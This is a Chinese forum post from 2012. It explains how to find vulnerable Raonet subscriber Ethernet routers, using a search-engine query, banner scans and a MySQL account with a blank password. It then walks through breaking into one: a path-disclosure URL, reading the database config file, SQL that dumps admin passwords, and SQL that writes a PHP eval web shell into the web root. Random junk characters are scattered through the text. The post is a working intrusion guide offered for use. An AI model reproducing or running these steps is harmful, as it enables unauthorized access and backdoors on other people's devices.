寻找存在漏洞的路由器方法:
' }3 E8 o, x! t9 e/ K; l9 a$ F( P) W P J$ r
1:google搜索'Raonet Subscriber Ethernet Router'- z; p0 I/ t' b9 t0 ~
5 H: ^+ m- C6 Z0 b5 F% q2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
- K1 z. K$ w) T. E3 o0 Z4 ]. [" Y/ b$ I0 c" s. u
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
* t1 |* _/ ~! A6 _: G" C, F8 B7 r: }4 n, R
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
G4 a1 S3 g, w7 G2 I: c+ a' B8 ^! v9 e# d
% L, V$ i# p) m% H3 j2 _1 {' s( P* T) Y0 g! u
入侵步骤:
% p7 \* O( `2 N. {/ n; x/ B1 i7 v L0 j: N1 U
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php, N5 ^7 ~& n J& E
! h0 {" J: @% @3 ^2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
) h- s% c2 l, h$ e6 K) ]# t# h8 Z3:得到密码后连接,查看GUI管理密码:
* _+ t# c% P7 S2 m2 Muse ser_5006 J v0 f W$ ^# L) N
select id,passwd from user;% e; b+ ]) [" r+ x' `6 z
4:通过数据库写入webshell,执行命令:' N& T( v& a1 x* O! U/ \1 {
use mysql;6 T4 {0 Q u* b# ^& E
create table ok(cmd TEXT);
6 e6 `+ R" b4 D% Z- pinsert into ok values("<?php @eval($_POST[cmd])?>");
. f% e, C, _2 ?, p& ^5 h6 ~+ f/ Dselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
/ c2 V; n$ o2 x, kdrop table ok;
" f5 _( N w7 G3 F0 M7 h8 b
* ^- h+ t" q' W) a7 y5:连接后门shell.php
( q3 W! ~ ~5 I- L$ W
7 l0 ~5 t f8 ?9 I5 n4 Q( I5 s6. 搞定!
6 s ]7 U4 J! G$ i' |* z. v& C* D, g
0 Q: T$ W! d' V1 W' A; t |
发表于 2012-12-10 10:30:18
收藏
支持
反对